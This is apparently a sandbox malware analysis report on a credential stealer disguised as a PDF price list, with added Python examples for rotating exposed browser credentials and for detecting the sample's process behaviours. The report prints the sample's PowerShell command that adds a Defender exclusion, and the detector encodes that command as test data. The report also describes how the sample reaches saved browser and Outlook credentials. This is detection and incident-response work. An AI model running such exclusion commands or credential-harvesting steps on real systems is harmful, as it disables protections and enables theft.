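The SQL string in the memory dumps above is the DDL of the password_notes table from Chromium's "Login Data" SQLite database, which is how the sample reaches saved browser credentials. For incident scoping, the accounts that were exposed can be listed directly from a copy of that file so their passwords can be rotated. The following is an added example written for this page, not code from the sample, from AgentTesla or from Joe Sandbox. It reproduces the page's password_notes DDL verbatim, uses a reduced stand-in for Chromium's logins table (an assumption: only the columns it reads; the real table has many more), builds a constructed in-memory database, and reads only plaintext metadata; it decrypts nothing.

```python
import sqlite3
from typing import List, Tuple

# password_notes DDL exactly as recovered from the sample's memory on this page.
PASSWORD_NOTES_DDL = (
    "CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, "
    "parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE "
    "DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, "
    "date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));"
)

# Reduced stand-in for Chromium's logins table (assumption for this example: only the
# columns read below; the real schema carries many more columns).
LOGINS_DDL = (
    "CREATE TABLE logins (id INTEGER PRIMARY KEY AUTOINCREMENT, origin_url VARCHAR NOT NULL, "
    "username_value VARCHAR, password_value BLOB, blacklisted_by_user INTEGER NOT NULL DEFAULT 0);"
)


def build_sample_login_data() -> sqlite3.Connection:
    """Constructed in-memory Login Data: two saved logins, one 'never save' entry, one note."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(LOGINS_DDL + PASSWORD_NOTES_DDL)
    conn.executemany(
        "INSERT INTO logins (origin_url, username_value, password_value, blacklisted_by_user) "
        "VALUES (?, ?, ?, ?)",
        [
            ("https://mail.example.com/login", "alice@example.com", b"v10\x00\x01\x02", 0),
            ("https://bank.example.org/", "alice", b"v10\x03\x04\x05", 0),
            # 'never save for this site' entry: flagged, no ciphertext stored
            ("https://forum.example.net/", "", b"", 1),
        ],
    )
    conn.execute(
        "INSERT INTO password_notes (parent_id, key, value, date_created, confidential) "
        "VALUES (1, '', X'00', 0, 1)"
    )
    conn.commit()
    return conn


def exposed_accounts(conn: sqlite3.Connection) -> List[Tuple[str, str, int]]:
    """Accounts a stealer that copied this file would have obtained: (origin, username,
    number of attached password notes). Blacklisted rows and rows with an empty
    ciphertext hold no secret and are skipped."""
    rows = conn.execute(
        "SELECT l.origin_url, l.username_value, COUNT(n.id) "
        "FROM logins l LEFT JOIN password_notes n ON n.parent_id = l.id "
        "WHERE l.blacklisted_by_user = 0 AND length(l.password_value) > 0 "
        "GROUP BY l.id ORDER BY l.origin_url"
    ).fetchall()
    return [(origin, user, int(count)) for origin, user, count in rows]


def exposed_accounts_from_file(path: str) -> List[Tuple[str, str, int]]:
    """Same query against an on-disk copy, opened read-only via a URI."""
    conn = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    try:
        return exposed_accounts(conn)
    finally:
        conn.close()


if __name__ == "__main__":
    for origin, user, notes in exposed_accounts(build_sample_login_data()):
        print(f"rotate: {user!r} at {origin} ({notes} note(s))")
```

Run it against a copy of the profile's Login Data file rather than the live one (the browser keeps the original locked); the password_value blobs stay wrapped, so the output is a rotation list, not a credential dump.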
Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe | ReversingLabs: Detection: 28%
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | File read: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe
Source: unknown | Process created: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Process created: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe "C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: unknown | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Process created: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe "C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
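The process tree above carries the behaviours a detection engineer keys on: a document extension in front of .exe in the initial sample name, PowerShell adding a Defender exclusion for the sample, the sample relaunching itself with an identical command line (the self-spawn pattern used to inject into a fresh copy), and a dropped copy running from AppData\Roaming. The following is an added example, not code from the page or from Joe Sandbox, that runs those four checks over process-creation events. The events are constructed to mirror the tree (PIDs, parentage and the explorer.exe and notepad.exe rows are assumptions); one extra row carries the same exclusion cmdlet inside a base64 -EncodedCommand, constructed here to show that the check has to decode the payload rather than grep the command line.

```python
import base64
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation event (constructed; PIDs and parentage are assumptions)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Document-like extensions that a double-extension lure hides ".exe" behind.
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "ppt", "pptx", "txt", "jpg", "png"}
# Directory fragments any user can write to; executables there deserve scrutiny.
USER_WRITABLE = ("\\appdata\\roaming\\", "\\appdata\\local\\temp\\", "\\users\\public\\")
# Add-/Set-MpPreference followed by any exclusion parameter, case-insensitive.
MPPREF_RE = re.compile(
    r"\b(?:Add|Set)-MpPreference\b.*?-Exclusion(?:Path|Process|Extension)\b", re.I | re.S
)
# -EncodedCommand and the abbreviations PowerShell accepts for it.
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str) -> str:
    """Return the -EncodedCommand payload (base64 of UTF-16LE) as text, '' if absent or invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def has_double_extension(image: str) -> bool:
    """True for names like 'invoice.pdf.exe': an .exe whose preceding suffix looks like a document."""
    parts = image.rsplit("\\", 1)[-1].lower().split(".")
    return len(parts) >= 3 and parts[-1] == "exe" and parts[-2] in DOC_EXTS


def tampers_with_defender(cmdline: str) -> bool:
    """Exclusion cmdlet present in clear text or inside the decoded -EncodedCommand payload."""
    return bool(MPPREF_RE.search(cmdline + "\n" + decode_encoded_command(cmdline)))


def runs_from_user_writable(image: str) -> bool:
    low = image.lower()
    return any(fragment in low for fragment in USER_WRITABLE)


def analyze(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    """Return (pid, rule) findings in event order; one PID may trigger several rules."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Tuple[int, str]] = []
    for e in events:
        parent = by_pid.get(e.ppid)
        if has_double_extension(e.image):
            findings.append((e.pid, "double_extension"))
        if e.image.lower().endswith("powershell.exe") and tampers_with_defender(e.cmdline):
            findings.append((e.pid, "defender_exclusion"))
        if runs_from_user_writable(e.image):
            findings.append((e.pid, "user_writable_image"))
        # Same image and identical command line as the parent: the self-spawn used to
        # start a fresh copy and inject into it.
        if parent and parent.image.lower() == e.image.lower() and parent.cmdline == e.cmdline:
            findings.append((e.pid, "self_spawn"))
    return findings


SAMPLE = "C:\\Users\\user\\Desktop\\26.09 01.10.2024Fiyat Listesi.pdf.exe"
DROP = "C:\\Users\\user\\AppData\\Roaming\\ctsdvwT\\ctsdvwT.exe"
PS = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed encoded form of the exclusion command; not something the report observed.
ENCODED = base64.b64encode(
    f'Add-MpPreference -ExclusionPath "{DROP}"'.encode("utf-16-le")
).decode("ascii")

# Constructed events modelled on the report's process tree.
SAMPLE_EVENTS = [
    ProcEvent(1000, 800, "C:\\Windows\\explorer.exe", "explorer.exe"),
    ProcEvent(1001, 1000, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(1002, 1001, PS, f'"{PS}" Add-MpPreference -ExclusionPath "{SAMPLE}"'),
    ProcEvent(1003, 1001, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(1004, 1003, DROP, f'"{DROP}"'),
    ProcEvent(1005, 1004, PS, f'"{PS}" -nop -w hidden -enc {ENCODED}'),
    ProcEvent(1006, 1004, DROP, f'"{DROP}"'),
    ProcEvent(1007, 1000, "C:\\Windows\\System32\\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for pid, rule in analyze(SAMPLE_EVENTS):
        print(pid, rule)
```

The self-spawn rule compares the full command line, not just the image, so a legitimate program that launches a helper copy with different arguments does not trip it; the exclusion rule concatenates the decoded payload with the raw command line so that one regex covers both forms.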
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe (first instance) | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, msasn1.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe (second instance) | Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, ntmarta.dll, vaultcli.dll, wintypes.dll, edputil.dll, iphlpapi.dll, dnsapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, winnsi.dll, mswsock.dll, rasadhlp.dll, fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe (instance 1) | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe (instance 2) | Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, vaultcli.dll, wintypes.dll, edputil.dll
Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe (instance 3) | Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, windowscodecs.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exeSection loaded: edputil.dll
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: Window Recorder | Window detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: oAlZ.pdbSHA2560 | source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ctsdvwT.exe.3.dr
                    Source: Binary string: oAlZ.pdb | source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, ctsdvwT.exe.3.dr

                    Data Obfuscation

                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe, Form1.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.33c5330.0.raw.unpack, JK.cs | .Net Code: ve System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, GfC7QCCjIwYVW1JcP5.cs | .Net Code: nDaRL6tOYk System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.461d600.4.raw.unpack, GfC7QCCjIwYVW1JcP5.cs | .Net Code: nDaRL6tOYk System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.5c10000.5.raw.unpack, JK.cs | .Net Code: ve System.Reflection.Assembly.Load(byte[])
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.33ce948.1.raw.unpack, JK.cs | .Net Code: ve System.Reflection.Assembly.Load(byte[])
                    Source: ctsdvwT.exe.3.dr, Form1.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe | Static PE information: 0xD684D858 [Tue Jan 18 10:39:20 2084 UTC]
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 0_2_0324EF83 push eax; iretd 0_2_0324EF89
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 0_2_07980720 push ebx; iretd 0_2_0798074E
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_05698921 push 0C418B05h; ret 3_2_05698933
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_05697410 push 18418B05h; ret 3_2_05697423
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_056972F1 push 10418B05h; ret 3_2_05697303
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_05697F6B push 28418B05h; ret 3_2_05697F73
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_05697F4B push 24418B05h; ret 3_2_05697F53
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_05697F20 push 20418B05h; ret 3_2_05697F33
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_05697F00 push 1C418B05h; ret 3_2_05697F13
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_05697F83 push 2C418B05h; ret 3_2_05697F93
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_05695E0C push 04418B05h; ret 3_2_05697403
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_05697EE0 push 14418B05h; ret 3_2_05697EF3
                    Source: C:\Users\user\Desktop\26.09 01.10.2024Fiyat Listesi.pdf.exe | Code function: 3_2_05697EC0 push 08418B05h; ret 3_2_05697ED3
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 5_2_0143EF82 push eax; iretd 5_2_0143EF89
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 8_2_0655D2D2 push es; ret 8_2_0655D2E0
                    Source: C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe | Code function: 10_2_00FCEF82 push eax; iretd 10_2_00FCEF89
                    Source: 26.09 01.10.2024Fiyat Listesi.pdf.exe | Static PE information: section name: .text entropy: 7.861932673509319
                    Source: ctsdvwT.exe.3.dr | Static PE information: section name: .text entropy: 7.861932673509319
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.33c5330.0.raw.unpack, JK.cs | High entropy of concatenated method names: 'JK', 'Y3', 'Lv', 'F5', 'q9', 'Ou', 'NL', 'tg', 'Jy', 'kq'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, AsGyZCzgTMR4SKARrf.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Epk4HbW4Dy', 'Veb4SGfuQh', 'cFb4WRXuxt', 'rrP4Ik2nUC', 'ly74fQWhpl', 'UHx44JHaiO', 'fMZ4clw8L2'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, vdlm9AVEXIdJgIbOd8.cs | High entropy of concatenated method names: 'p5IfnUhXrw', 'QZ7fAGQvEg', 'TJnfpTRde4', 't87fDqNciJ', 'ryMfshVBAf', 'PrWfyJtjGY', 'Wr3fC4HDoK', 'PsFfi9Sx6S', 'wQVfbULxr4', 'Hbnf8vSvfA'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, Pr610lZQJPnBqVUMpg.cs | High entropy of concatenated method names: 'u6bmUGdW5iu2xMOghvW', 'FnnivgdXLPWMaSNOoKA', 'ckysfiXw2J', 'm3Qs4jbwqq', 'IX9sc6vmcf', 'x6GWgtdy4b4o5SaFZM9', 'kCTBDDdeykJEvDTa5Zf'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, RpNtdwGk4mtG5ISUjB4.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'JE1cUipZAs', 'u6ecoPw8jl', 'OuhcO4DT33', 'DHQc5bG0p6', 'juccqO8PC2', 'pQEcj2NMkB', 'mqxc3ulSM6'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, Y7pkh21m9KcTRqOks4.cs | High entropy of concatenated method names: 'xsHHv04ykA', 'bWbHXSvlAs', 'L0KHM91JQR', 'VoHHZNqTEM', 'VVQHlQnjT2', 'yIJH2uAuLh', 'cbFH03AjoQ', 'HV3HPYO0wt', 'WNaHtxhkTg', 'sq8H7VZpBG'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, kUfAZeXkYTCn5qOeSR.cs | High entropy of concatenated method names: 'th9pYBetSL', 'UnYpxDhxlU', 'WZQpvcW6QP', 'D7IpXjj572', 'hq4pSyW3en', 'xCvpW6FXe4', 'H0qpIQNEX6', 'zskpfWeh81', 'f8fp4J5g93', 'W5EpchMyAD'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, pIOXZfAUCI1NJ36aoD.cs | High entropy of concatenated method names: 'Dispose', 'AgGGuslF2S', 'OEsTZxrloq', 'GnMZZZdAy3', 'nedGFlm9AE', 'EIdGzJgIbO', 'ProcessDialogKey', 'e8ATBuJ1oY', 'm7ZTG4qheE', 'i6fTThDw2E'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, HZbm2yOY3UJaCfctBW.cs | High entropy of concatenated method names: 'ToString', 'FD1W7lvgUD', 'VdNWZWoZOx', 'wgHWQGt9nO', 'xHnWl6OR2l', 'eJwW2ugL6q', 'nkqWK4PkDA', 'SkfW091axX', 'RnuWPdhNFB', 'Sa3WmMhRYF'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, zwVVUIKidr6EYTWQLK.cs | High entropy of concatenated method names: 'Br8sO5wCwg', 'nNTs5YG5kZ', 'WDYsqwt09N', 'ToString', 'DbssjlHLmJ', 'PbKs3gaTt7', 'IigwyqdbK72KaQIMOS4', 'BQOY2SduD6b7NHUCRBv', 'daiFtQdhjhBWBM0qhBF', 'q6H9mddL7w3QE0NFkcK'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, Np44hRR4WowCbwIcW3.cs | High entropy of concatenated method names: 'QqyGyvk3pj', 'jguGCvOKtN', 'vkYGbTCn5q', 'SeSG8Rv4BE', 'mLmGSAcwlj', 'i6fGW5f28c', 'U3ZVbX0dhCY4Qt0YnC', 'Y14lCnOh8N2bTHZbxP', 'CMxGGGqoWR', 'LEOGk8ZVRx'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, jvk3pjvyguvOKtNTem.cs | High entropy of concatenated method names: 'NYCAURke99', 'qGPAoxJvSy', 'nJbAO8BMwv', 'rkKA5EV0RC', 'jj1AqjRIsE', 'Vs3Ajl0QF0', 'dAPA3IHJ9v', 'S6AAV1u8bw', 'DnwAu3Yd2M', 'PZfAFm82lj'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, TmcsV7GBseGiKp8xPE5.cs | High entropy of concatenated method names: 'jmM4EPULpy', 'oKv4gPk6YE', 'Vuq4LFhyH9', 'Nc64YcjXNY', 'XOk4rxg9qp', 'YPk4xot3xS', 'UbT4aMSayQ', 'EJt4vRLqMF', 'QlF4XmwiP6', 'Dad49Go9Sq'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, tljs6fM5f28cZZv0ys.cs | High entropy of concatenated method names: 'JeisdRVj72', 'mCtsAT5Mne', 'GP0sDDJlnO', 'fyCsys5Kcs', 'o7ysCBU5r8', 'B3ADqHVExT', 'YqeDjtK71W', 'kYlD3nnUXM', 'MtYDVJTINc', 'KuSDur8C1L'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, nm7U2gjKQs5pqglCSj.cs | High entropy of concatenated method names: 'AIpIVGqPab', 'fWFIFVQg6i', 'crlfBYyXPl', 'LX3fGOq6uy', 'hfwI7reEcV', 'V8UIN9sphB', 'NS3I1KTKDu', 'QtvIUAuCwG', 'IqZIoSW5xM', 'P5RIOoXpR9'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, YibXPc0SHogQCZdwwV.cs | High entropy of concatenated method names: 'kFJynULVRv', 'Ae0yp6CGYi', 'L9Aysf8gmx', 'ESHsF4DoNA', 'XRXszE7Enh', 'rw1yBtkoF6', 'PM1yGTvdxF', 'ufTyTBUmFw', 'Cfxyk8y2aT', 'vYoyRGDnyO'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, zOV4n5T1q7gMf0ZNoO.cs | High entropy of concatenated method names: 'TDMLRxSlq', 'IPvYNAV0R', 'D5Yxr0vW6', 'eJeaii2tO', 'htIXKxNWl', 'QHd9X4hgB', 'VSty5dgafHJBLGQcDs', 'L9ZxrgkI2c4FOwgPyl', 'zag43uC14kqjIt9Hwi', 'Co7fEAgqS'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, xDw2ELFt4Xo5vfTyeF.cs | High entropy of concatenated method names: 'FJj4GgtrdP', 'Bou4kRb3ef', 'B1J4RDrXgk', 'TyY4nWlJew', 'RyY4A8sS0o', 'uhm4DcfChL', 'vtL4sOaOLM', 'XFnf3JAIlx', 'tApfVjgH7e', 'UBkfud9Axl'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, D4BEQu9Cihv1XbLmAc.cs | High entropy of concatenated method names: 'FZdDrgGrF7', 'qruDaEhtPu', 'eahpQE9AZw', 'USiplJGyD3', 'YRxp2IdlQs', 'zfqpKdFH5u', 'pbNp0lWCqD', 'TdnpPeSvXA', 'WvnpmZ6IHy', 'yMoptgwLHb'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, ixuyA3mZZVVGTgDOSP.cs | High entropy of concatenated method names: 'FuNyE6tpgX', 'XmNygceMv8', 'Gg2yLjCvJD', 'tk7yYglUrr', 'XBcyruOq2X', 'L11yxDPIj9', 'L1AyaXXYo9', 'x1Uyvsi6h7', 'aVyyXMxD0L', 'ruXy98ek8n'
                    Source: 0.2.26.09 01.10.2024Fiyat Listesi.pdf.exe.7c30000.6.raw.unpack, fuJ1oYu87Z4qheEs6f.cs | High entropy of concatenated method names: 'yi5fMMvFXp', 'X6NfZ8RsrQ', 'ppYfQmBWhQ', 'YuZflyYdZN', 'b0OfUA24Aw', 'o3Sf22AxRX', 'Next', 'Next', 'Next', 'NextBytes'
